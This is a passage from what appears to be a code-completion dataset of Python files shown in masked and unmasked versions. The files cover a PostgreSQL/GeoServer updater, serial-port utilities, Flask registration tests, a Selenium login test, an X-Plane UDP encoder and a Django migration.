database=\"ICU\")\n cursor = connection.cursor()\n sql_Query = statement\n #print(sql_Query)\n cursor.execute(sql_Query)\n connection.commit()\n #print(\"Selecting rows from mobile table using cursor.fetchall\")\n #mobile_records = cursor.fetchall() \n \n #print(\"Print each row and it's columns values\")\n #for row in mobile_records:\n # return_ls.append(list(row))\n \n except (Exception, psycopg2.Error) as error :\n print (\"Error while fetching data from PostgreSQL: \", error)\n \n finally:\n #closing database connection.\n if(connection):\n cursor.close()\n connection.close()\n #print(\"PostgreSQL connection is closed\")\n \n return return_ls\n\n\n# update database in postgis\ncsv_parser(\"DELETE FROM icu_data\")\ncsv_parser(instr)\n\n# Update map data in server\ncsv_parser(\"DELETE FROM icu_map\")\ncsv_parser(instr_map)\n\n\n\n\"\"\"\nGeoServer Connector\n\"\"\"\ntry:\n\tdf_geojson = pd.read_json(\"https://zgis187.geo.sbg.ac.at/geoserver/IPSDI_WT20/ows?service=WFS&version=1.0.0&request=GetFeature&typeName=IPSDI_WT20%3Aicu_map&maxFeatures=50&outputFormat=application%2Fjson\")\n\tdf_geojson.to_pickle(\"/var/www/FlaskApp/FlaskApp/data/df_geojson.pkl\")\nexcept:\n\tprint(\"an exception occured connecting to the geoserver\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import serial
import time
from Files_management import get_mov_parameters,change_mov_parameters
#-------------------------------------------------------------------------------
def create_port():
port = get_mov_parameters()[1]
try:
ser = serial.Serial(port=port,baudrate=9600,timeout=1)
return ser
except:
print('Open port failded')
change_mov_parameters('0',port,'0','0')
return False
#-------------------------------------------------------------------------------
def port_status(ser):
if(ser.isOpen()):
if(get_mov_parameters()[0] == "1" or get_mov_parameters()[0] == "True"):
return True
else:
try:
create_port()
return True
except:
print("error opening")
change_mov_parameters('0',get_mov_parameters()[1],'0','0')
return False
#-------------------------------------------------------------------------------
def close_port(ser):
ser.close()
#-------------------------------------------------------------------------------
def send_value(value):
port = create_port()
status = get_mov_parameters()[0]
if(port_status(port)):
if(status == '1' or status == 'True'):
string = "".join([str(value),' \n'])
port.write(string.encode())
print('True')
else :
print('False')
|
normal
|
{
"blob_id": "72cda573bf9c744213a2957d51171f437f211353",
"index": 3467,
"step-1": "<mask token>\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-2": "<mask token>\n\n\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port, baudrate=9600, timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0', port, '0', '0')\n return False\n\n\ndef port_status(ser):\n if ser.isOpen():\n if get_mov_parameters()[0] == '1' or get_mov_parameters()[0] == 'True':\n return True\n else:\n try:\n create_port()\n return True\n except:\n print('error opening')\n change_mov_parameters('0', get_mov_parameters()[1], '0', '0')\n return False\n\n\n<mask token>\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-3": "<mask token>\n\n\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port, baudrate=9600, timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0', port, '0', '0')\n return False\n\n\ndef port_status(ser):\n if ser.isOpen():\n if get_mov_parameters()[0] == '1' or get_mov_parameters()[0] == 'True':\n return True\n else:\n try:\n create_port()\n return True\n except:\n print('error opening')\n change_mov_parameters('0', get_mov_parameters()[1], '0', '0')\n return False\n\n\ndef close_port(ser):\n ser.close()\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-4": "import serial\nimport time\nfrom Files_management import get_mov_parameters, change_mov_parameters\n\n\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port, baudrate=9600, timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0', port, '0', '0')\n return False\n\n\ndef port_status(ser):\n if ser.isOpen():\n if get_mov_parameters()[0] == '1' or get_mov_parameters()[0] == 'True':\n return True\n else:\n try:\n create_port()\n return True\n except:\n print('error opening')\n change_mov_parameters('0', get_mov_parameters()[1], '0', '0')\n return False\n\n\ndef close_port(ser):\n ser.close()\n\n\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if port_status(port):\n if status == '1' or status == 'True':\n string = ''.join([str(value), ' \\n'])\n port.write(string.encode())\n print('True')\n else:\n print('False')\n",
"step-5": "import serial\nimport time\nfrom Files_management import get_mov_parameters,change_mov_parameters\n\n#-------------------------------------------------------------------------------\ndef create_port():\n port = get_mov_parameters()[1]\n try:\n ser = serial.Serial(port=port,baudrate=9600,timeout=1)\n return ser\n except:\n print('Open port failded')\n change_mov_parameters('0',port,'0','0')\n return False\n\n#-------------------------------------------------------------------------------\ndef port_status(ser):\n if(ser.isOpen()):\n if(get_mov_parameters()[0] == \"1\" or get_mov_parameters()[0] == \"True\"):\n return True\n else: \n try:\n create_port()\n return True\n except:\n print(\"error opening\")\n change_mov_parameters('0',get_mov_parameters()[1],'0','0')\n return False\n\n#-------------------------------------------------------------------------------\ndef close_port(ser):\n ser.close()\n\n#-------------------------------------------------------------------------------\ndef send_value(value):\n port = create_port()\n status = get_mov_parameters()[0]\n if(port_status(port)):\n if(status == '1' or status == 'True'):\n string = \"\".join([str(value),' \\n'])\n port.write(string.encode())\n print('True')\n else :\n print('False')\n \n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
import json
from test.test_basic import BaseCase
class TestUserRegister(BaseCase):
"""
TestClass to test the register function.
"""
def test_successful_register(self):
# Given
payload = json.dumps({
"username": "userjw",
"password": "1q2w3e4r"
})
# When
response = self.app.post('/register', headers={"Content-Type": "application/json"}, data=payload)
# Then
self.assertEqual({"message": "User created successfully."}, response.json)
self.assertEqual(201, response.status_code)
def test_signup_with_non_existing_field(self):
# Given
payload = json.dumps({
"username": "userjw",
"password": "1q2w3e4r",
"email": "foo@bar.de"
})
# When
response = self.app.post('/register', headers={"Content-Type": "application/json"}, data=payload)
# Then
self.assertEqual({"message": "User created successfully."}, response.json)
self.assertEqual(201, response.status_code)
def test_signup_without_username(self):
# Given
payload = json.dumps({
"password": "1q2w3e4r"
})
# When
response = self.app.post('/register', headers={"Content-Type": "application/json"}, data=payload)
# Then
self.assertEqual({"username": "This field cannot be blank!"}, response.json['message'])
self.assertEqual(400, response.status_code)
def test_signup_without_password(self):
# Given
payload = json.dumps({
"username": "userjw"
})
# When
response = self.app.post('/register', headers={"Content-Type": "application/json"}, data=payload)
# Then
self.assertEqual({"password": "This field cannot be blank!"}, response.json['message'])
self.assertEqual(400, response.status_code)
def test_creating_already_existing_user(self):
# Given
payload = json.dumps({
"username": "userjw",
"password": "1q2w3e4r",
})
# Preconditions
response = self.app.post('/register', headers={"Content-Type": "application/json"}, data=payload)
# When
response = self.app.post('/register', headers={"Content-Type": "application/json"}, data=payload)
# Then
self.assertEqual({"message": "A user '{}' already exists!".format(json.loads(payload)['username'])}, response.json)
self.assertEqual(400, response.status_code)
|
normal
|
{
"blob_id": "486362463dc07bdafea85de39a4a6d58cb8c8f26",
"index": 9643,
"step-1": "<mask token>\n\n\nclass TestUserRegister(BaseCase):\n <mask token>\n <mask token>\n\n def test_signup_with_non_existing_field(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r',\n 'email': 'foo@bar.de'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': 'User created successfully.'},\n response.json)\n self.assertEqual(201, response.status_code)\n <mask token>\n\n def test_signup_without_password(self):\n payload = json.dumps({'username': 'userjw'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'password': 'This field cannot be blank!'},\n response.json['message'])\n self.assertEqual(400, response.status_code)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestUserRegister(BaseCase):\n <mask token>\n\n def test_successful_register(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': 'User created successfully.'},\n response.json)\n self.assertEqual(201, response.status_code)\n\n def test_signup_with_non_existing_field(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r',\n 'email': 'foo@bar.de'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': 'User created successfully.'},\n response.json)\n self.assertEqual(201, response.status_code)\n <mask token>\n\n def test_signup_without_password(self):\n payload = json.dumps({'username': 'userjw'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'password': 'This field cannot be blank!'},\n response.json['message'])\n self.assertEqual(400, response.status_code)\n\n def test_creating_already_existing_user(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': \"A user '{}' already exists!\".format(\n json.loads(payload)['username'])}, response.json)\n self.assertEqual(400, response.status_code)\n",
"step-3": "<mask token>\n\n\nclass TestUserRegister(BaseCase):\n <mask token>\n\n def test_successful_register(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': 'User created successfully.'},\n response.json)\n self.assertEqual(201, response.status_code)\n\n def test_signup_with_non_existing_field(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r',\n 'email': 'foo@bar.de'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': 'User created successfully.'},\n response.json)\n self.assertEqual(201, response.status_code)\n\n def test_signup_without_username(self):\n payload = json.dumps({'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'username': 'This field cannot be blank!'},\n response.json['message'])\n self.assertEqual(400, response.status_code)\n\n def test_signup_without_password(self):\n payload = json.dumps({'username': 'userjw'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'password': 'This field cannot be blank!'},\n response.json['message'])\n self.assertEqual(400, response.status_code)\n\n def test_creating_already_existing_user(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': \"A user '{}' already exists!\".format(\n json.loads(payload)['username'])}, response.json)\n self.assertEqual(400, response.status_code)\n",
"step-4": "import json\nfrom test.test_basic import BaseCase\n\n\nclass TestUserRegister(BaseCase):\n \"\"\"\n TestClass to test the register function.\n \"\"\"\n\n def test_successful_register(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': 'User created successfully.'},\n response.json)\n self.assertEqual(201, response.status_code)\n\n def test_signup_with_non_existing_field(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r',\n 'email': 'foo@bar.de'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': 'User created successfully.'},\n response.json)\n self.assertEqual(201, response.status_code)\n\n def test_signup_without_username(self):\n payload = json.dumps({'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'username': 'This field cannot be blank!'},\n response.json['message'])\n self.assertEqual(400, response.status_code)\n\n def test_signup_without_password(self):\n payload = json.dumps({'username': 'userjw'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'password': 'This field cannot be blank!'},\n response.json['message'])\n self.assertEqual(400, response.status_code)\n\n def test_creating_already_existing_user(self):\n payload = json.dumps({'username': 'userjw', 'password': '1q2w3e4r'})\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n response = self.app.post('/register', headers={'Content-Type':\n 'application/json'}, data=payload)\n self.assertEqual({'message': \"A user '{}' already exists!\".format(\n json.loads(payload)['username'])}, response.json)\n self.assertEqual(400, response.status_code)\n",
"step-5": "import json\n\nfrom test.test_basic import BaseCase\n\n\nclass TestUserRegister(BaseCase):\n \"\"\"\n TestClass to test the register function.\n \"\"\"\n def test_successful_register(self):\n # Given\n payload = json.dumps({\n \"username\": \"userjw\",\n \"password\": \"1q2w3e4r\"\n })\n # When\n response = self.app.post('/register', headers={\"Content-Type\": \"application/json\"}, data=payload)\n\n # Then\n self.assertEqual({\"message\": \"User created successfully.\"}, response.json)\n self.assertEqual(201, response.status_code)\n\n def test_signup_with_non_existing_field(self):\n # Given\n payload = json.dumps({\n \"username\": \"userjw\",\n \"password\": \"1q2w3e4r\",\n \"email\": \"foo@bar.de\"\n })\n # When\n response = self.app.post('/register', headers={\"Content-Type\": \"application/json\"}, data=payload)\n\n # Then\n self.assertEqual({\"message\": \"User created successfully.\"}, response.json)\n self.assertEqual(201, response.status_code)\n\n def test_signup_without_username(self):\n # Given\n payload = json.dumps({\n \"password\": \"1q2w3e4r\"\n })\n # When\n response = self.app.post('/register', headers={\"Content-Type\": \"application/json\"}, data=payload)\n\n # Then\n self.assertEqual({\"username\": \"This field cannot be blank!\"}, response.json['message'])\n self.assertEqual(400, response.status_code)\n\n def test_signup_without_password(self):\n # Given\n payload = json.dumps({\n \"username\": \"userjw\"\n })\n # When\n response = self.app.post('/register', headers={\"Content-Type\": \"application/json\"}, data=payload)\n\n # Then\n self.assertEqual({\"password\": \"This field cannot be blank!\"}, response.json['message'])\n self.assertEqual(400, response.status_code)\n\n def test_creating_already_existing_user(self):\n # Given\n payload = json.dumps({\n \"username\": \"userjw\",\n \"password\": \"1q2w3e4r\",\n })\n # Preconditions\n response = self.app.post('/register', headers={\"Content-Type\": \"application/json\"}, data=payload)\n\n # When\n response = self.app.post('/register', headers={\"Content-Type\": \"application/json\"}, data=payload)\n\n # Then\n self.assertEqual({\"message\": \"A user '{}' already exists!\".format(json.loads(payload)['username'])}, response.json)\n self.assertEqual(400, response.status_code)\n",
"step-ids": [
3,
5,
6,
8,
9
]
}
|
[
3,
5,
6,
8,
9
] |
# Generated by Selenium IDE
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
class TestSTCHANGE():
def setup_method(self, method):
self.driver = webdriver.Chrome()
self.vars = {}
def teardown_method(self, method):
self.driver.quit()
def test_sTCHANGE(self):
# Test name: ST CHANGE
# Step # | name | target | value
# 1 | open | /main/desktop-login.html |
self.driver.get("http://10.51.30.52:8090/main/desktop-login.html")
# 2 | setWindowSize | 976x696 |
self.driver.set_window_size(976, 696)
# 3 | click | id=idInputUsername |
self.driver.find_element(By.ID, "idInputUsername").click()
# 4 | type | id=idInputUsername | SUPERVISOR
self.driver.find_element(By.ID, "idInputUsername").send_keys("SUPERVISOR")
# 5 | click | id=login-panel |
self.driver.find_element(By.ID, "login-panel").click()
# 6 | click | id=idInputPassword |
self.driver.find_element(By.ID, "idInputPassword").click()
# 7 | type | id=idInputPassword | **
self.driver.find_element(By.ID, "idInputPassword").send_keys("**")
# 8 | click | id=submit.button |
self.driver.find_element(By.ID, "submit.button").click()
# 9 | click | id=BVMAPS |
self.driver.find_element(By.ID, "BVMAPS").click()
# 10 | click | css=#UI_BADGES_GRID\.gridView\.row\#22_Tcell\#0 > div > div |
self.driver.find_element(By.CSS_SELECTOR, "#UI_BADGES_GRID\\.gridView\\.row\\#22_Tcell\\#0 > div > div").click()
# 11 | click | id=badge.html.ribbon.properties |
self.driver.find_element(By.ID, "badge.html.ribbon.properties").click()
# 12 | click | id=__selection_4 |
self.driver.find_element(By.ID, "__selection_4").click()
# 13 | mouseDown | css=#\__pan_4 > .listItemNormal:nth-child(2) |
element = self.driver.find_element(By.CSS_SELECTOR, "#\\__pan_4 > .listItemNormal:nth-child(2)")
actions = ActionChains(self.driver)
actions.move_to_element(element).click_and_hold().perform()
# 14 | mouseUp | id=__selection_5 |
element = self.driver.find_element(By.ID, "__selection_5")
actions = ActionChains(self.driver)
actions.move_to_element(element).release().perform()
# 15 | click | css=#PROPERTIES_CONTROLS td:nth-child(2) .middlePart |
self.driver.find_element(By.CSS_SELECTOR, "#PROPERTIES_CONTROLS td:nth-child(2) .middlePart").click()
# 16 | click | id=badge.html.ribbon.properties.apply |
self.driver.find_element(By.ID, "badge.html.ribbon.properties.apply").click()
# 17 | click | css=body > img |
self.driver.find_element(By.CSS_SELECTOR, "body > img").click()
# 18 | click | css=a > img |
self.driver.find_element(By.CSS_SELECTOR, "a > img").click()
# 19 | click | id=main.html.btn_logout |
self.driver.find_element(By.ID, "main.html.btn_logout").click()
|
normal
|
{
"blob_id": "87f8cc65cf7d0ea932de79a6daf5b29ad387ec6f",
"index": 7103,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestSTCHANGE:\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass TestSTCHANGE:\n\n def setup_method(self, method):\n self.driver = webdriver.Chrome()\n self.vars = {}\n\n def teardown_method(self, method):\n self.driver.quit()\n\n def test_sTCHANGE(self):\n self.driver.get('http://10.51.30.52:8090/main/desktop-login.html')\n self.driver.set_window_size(976, 696)\n self.driver.find_element(By.ID, 'idInputUsername').click()\n self.driver.find_element(By.ID, 'idInputUsername').send_keys(\n 'SUPERVISOR')\n self.driver.find_element(By.ID, 'login-panel').click()\n self.driver.find_element(By.ID, 'idInputPassword').click()\n self.driver.find_element(By.ID, 'idInputPassword').send_keys('**')\n self.driver.find_element(By.ID, 'submit.button').click()\n self.driver.find_element(By.ID, 'BVMAPS').click()\n self.driver.find_element(By.CSS_SELECTOR,\n '#UI_BADGES_GRID\\\\.gridView\\\\.row\\\\#22_Tcell\\\\#0 > div > div'\n ).click()\n self.driver.find_element(By.ID, 'badge.html.ribbon.properties').click()\n self.driver.find_element(By.ID, '__selection_4').click()\n element = self.driver.find_element(By.CSS_SELECTOR,\n '#\\\\__pan_4 > .listItemNormal:nth-child(2)')\n actions = ActionChains(self.driver)\n actions.move_to_element(element).click_and_hold().perform()\n element = self.driver.find_element(By.ID, '__selection_5')\n actions = ActionChains(self.driver)\n actions.move_to_element(element).release().perform()\n self.driver.find_element(By.CSS_SELECTOR,\n '#PROPERTIES_CONTROLS td:nth-child(2) .middlePart').click()\n self.driver.find_element(By.ID, 'badge.html.ribbon.properties.apply'\n ).click()\n self.driver.find_element(By.CSS_SELECTOR, 'body > img').click()\n self.driver.find_element(By.CSS_SELECTOR, 'a > img').click()\n self.driver.find_element(By.ID, 'main.html.btn_logout').click()\n",
"step-4": "import pytest\nimport time\nimport json\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\n\nclass TestSTCHANGE:\n\n def setup_method(self, method):\n self.driver = webdriver.Chrome()\n self.vars = {}\n\n def teardown_method(self, method):\n self.driver.quit()\n\n def test_sTCHANGE(self):\n self.driver.get('http://10.51.30.52:8090/main/desktop-login.html')\n self.driver.set_window_size(976, 696)\n self.driver.find_element(By.ID, 'idInputUsername').click()\n self.driver.find_element(By.ID, 'idInputUsername').send_keys(\n 'SUPERVISOR')\n self.driver.find_element(By.ID, 'login-panel').click()\n self.driver.find_element(By.ID, 'idInputPassword').click()\n self.driver.find_element(By.ID, 'idInputPassword').send_keys('**')\n self.driver.find_element(By.ID, 'submit.button').click()\n self.driver.find_element(By.ID, 'BVMAPS').click()\n self.driver.find_element(By.CSS_SELECTOR,\n '#UI_BADGES_GRID\\\\.gridView\\\\.row\\\\#22_Tcell\\\\#0 > div > div'\n ).click()\n self.driver.find_element(By.ID, 'badge.html.ribbon.properties').click()\n self.driver.find_element(By.ID, '__selection_4').click()\n element = self.driver.find_element(By.CSS_SELECTOR,\n '#\\\\__pan_4 > .listItemNormal:nth-child(2)')\n actions = ActionChains(self.driver)\n actions.move_to_element(element).click_and_hold().perform()\n element = self.driver.find_element(By.ID, '__selection_5')\n actions = ActionChains(self.driver)\n actions.move_to_element(element).release().perform()\n self.driver.find_element(By.CSS_SELECTOR,\n '#PROPERTIES_CONTROLS td:nth-child(2) .middlePart').click()\n self.driver.find_element(By.ID, 'badge.html.ribbon.properties.apply'\n ).click()\n self.driver.find_element(By.CSS_SELECTOR, 'body > img').click()\n self.driver.find_element(By.CSS_SELECTOR, 'a > img').click()\n self.driver.find_element(By.ID, 'main.html.btn_logout').click()\n",
"step-5": "# Generated by Selenium IDE\nimport pytest\nimport time\nimport json\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\n\nclass TestSTCHANGE():\n def setup_method(self, method):\n self.driver = webdriver.Chrome()\n self.vars = {}\n\n def teardown_method(self, method):\n self.driver.quit()\n\n def test_sTCHANGE(self):\n # Test name: ST CHANGE\n # Step # | name | target | value\n # 1 | open | /main/desktop-login.html |\n self.driver.get(\"http://10.51.30.52:8090/main/desktop-login.html\")\n # 2 | setWindowSize | 976x696 |\n self.driver.set_window_size(976, 696)\n # 3 | click | id=idInputUsername |\n self.driver.find_element(By.ID, \"idInputUsername\").click()\n # 4 | type | id=idInputUsername | SUPERVISOR\n self.driver.find_element(By.ID, \"idInputUsername\").send_keys(\"SUPERVISOR\")\n # 5 | click | id=login-panel |\n self.driver.find_element(By.ID, \"login-panel\").click()\n # 6 | click | id=idInputPassword |\n self.driver.find_element(By.ID, \"idInputPassword\").click()\n # 7 | type | id=idInputPassword | **\n self.driver.find_element(By.ID, \"idInputPassword\").send_keys(\"**\")\n # 8 | click | id=submit.button |\n self.driver.find_element(By.ID, \"submit.button\").click()\n # 9 | click | id=BVMAPS |\n self.driver.find_element(By.ID, \"BVMAPS\").click()\n # 10 | click | css=#UI_BADGES_GRID\\.gridView\\.row\\#22_Tcell\\#0 > div > div |\n self.driver.find_element(By.CSS_SELECTOR, \"#UI_BADGES_GRID\\\\.gridView\\\\.row\\\\#22_Tcell\\\\#0 > div > div\").click()\n # 11 | click | id=badge.html.ribbon.properties |\n self.driver.find_element(By.ID, \"badge.html.ribbon.properties\").click()\n # 12 | click | id=__selection_4 |\n self.driver.find_element(By.ID, \"__selection_4\").click()\n # 13 | mouseDown | css=#\\__pan_4 > .listItemNormal:nth-child(2) |\n element = self.driver.find_element(By.CSS_SELECTOR, \"#\\\\__pan_4 > .listItemNormal:nth-child(2)\")\n actions = ActionChains(self.driver)\n actions.move_to_element(element).click_and_hold().perform()\n # 14 | mouseUp | id=__selection_5 |\n element = self.driver.find_element(By.ID, \"__selection_5\")\n actions = ActionChains(self.driver)\n actions.move_to_element(element).release().perform()\n # 15 | click | css=#PROPERTIES_CONTROLS td:nth-child(2) .middlePart |\n self.driver.find_element(By.CSS_SELECTOR, \"#PROPERTIES_CONTROLS td:nth-child(2) .middlePart\").click()\n # 16 | click | id=badge.html.ribbon.properties.apply |\n self.driver.find_element(By.ID, \"badge.html.ribbon.properties.apply\").click()\n # 17 | click | css=body > img |\n self.driver.find_element(By.CSS_SELECTOR, \"body > img\").click()\n # 18 | click | css=a > img |\n self.driver.find_element(By.CSS_SELECTOR, \"a > img\").click()\n # 19 | click | id=main.html.btn_logout |\n self.driver.find_element(By.ID, \"main.html.btn_logout\").click()\n",
"step-ids": [
0,
1,
4,
5,
6
]
}
|
[
0,
1,
4,
5,
6
] |
import socket
import struct
from fsuipc_airspaces.position import Position
# Adapted from tools/faker.js in github.com/foucdeg/airspaces
_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])
_END_BUFFER = bytes([0] * 20)
_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])
_END_TRANSPONDER = bytes([0] * 24)
def _encode(position: Position) -> bytes:
return _START_BUFFER \
+ struct.pack("<fff", position.latitude, position.longitude, position.altitude) \
+ _END_BUFFER \
+ _START_TRANSPONDER \
+ struct.pack("<f", position.transponder) \
+ _END_TRANSPONDER
class XPlaneDataOut():
def __init__(self, host: str, port: int) -> None:
self.address = (host, port)
self.socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
def write(self, data: Position) -> None:
self.socket.sendto(_encode(data), self.address)
|
normal
|
{
"blob_id": "68fa47e528e5c7c553c3c49ee5b7372b8a956302",
"index": 3364,
"step-1": "<mask token>\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-2": "<mask token>\n\n\ndef _encode(position: Position) ->bytes:\n return _START_BUFFER + struct.pack('<fff', position.latitude, position.\n longitude, position.altitude\n ) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.\n transponder) + _END_TRANSPONDER\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-3": "<mask token>\n_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])\n_END_BUFFER = bytes([0] * 20)\n_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])\n_END_TRANSPONDER = bytes([0] * 24)\n\n\ndef _encode(position: Position) ->bytes:\n return _START_BUFFER + struct.pack('<fff', position.latitude, position.\n longitude, position.altitude\n ) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.\n transponder) + _END_TRANSPONDER\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-4": "import socket\nimport struct\nfrom fsuipc_airspaces.position import Position\n_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])\n_END_BUFFER = bytes([0] * 20)\n_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])\n_END_TRANSPONDER = bytes([0] * 24)\n\n\ndef _encode(position: Position) ->bytes:\n return _START_BUFFER + struct.pack('<fff', position.latitude, position.\n longitude, position.altitude\n ) + _END_BUFFER + _START_TRANSPONDER + struct.pack('<f', position.\n transponder) + _END_TRANSPONDER\n\n\nclass XPlaneDataOut:\n\n def __init__(self, host: str, port: int) ->None:\n self.address = host, port\n self.socket = socket.socket(family=socket.AF_INET, type=socket.\n SOCK_DGRAM)\n\n def write(self, data: Position) ->None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-5": "import socket\nimport struct\n\nfrom fsuipc_airspaces.position import Position\n\n\n# Adapted from tools/faker.js in github.com/foucdeg/airspaces\n_START_BUFFER = bytes([68, 65, 84, 65, 60, 20, 0, 0, 0])\n_END_BUFFER = bytes([0] * 20)\n_START_TRANSPONDER = bytes([104, 0, 0, 0, 0, 0, 0, 0])\n_END_TRANSPONDER = bytes([0] * 24)\n\n\ndef _encode(position: Position) -> bytes:\n return _START_BUFFER \\\n + struct.pack(\"<fff\", position.latitude, position.longitude, position.altitude) \\\n + _END_BUFFER \\\n + _START_TRANSPONDER \\\n + struct.pack(\"<f\", position.transponder) \\\n + _END_TRANSPONDER\n\n\nclass XPlaneDataOut():\n def __init__(self, host: str, port: int) -> None:\n self.address = (host, port)\n\n self.socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n\n def write(self, data: Position) -> None:\n self.socket.sendto(_encode(data), self.address)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# Generated by Django 3.1.3 on 2020-11-27 02:17
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('foodBookApp', '0027_remove_post_total_comments'),
]
operations = [
migrations.AlterField(
model_name='post',
name='likes',
field=models.ManyToManyField(blank=True, related_name='like_post', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='post',
name='privacy',
field=models.CharField(choices=[('public', 'Public'), ('private', 'Private'), ('friends', 'Friends Only')], default='public', max_length=7),
),
migrations.AlterField(
model_name='profile',
name='privacy',
field=models.CharField(choices=[('public', 'Public'), ('private', 'Private'), ('friends', 'Friends Only')], default='public', max_length=7),
),
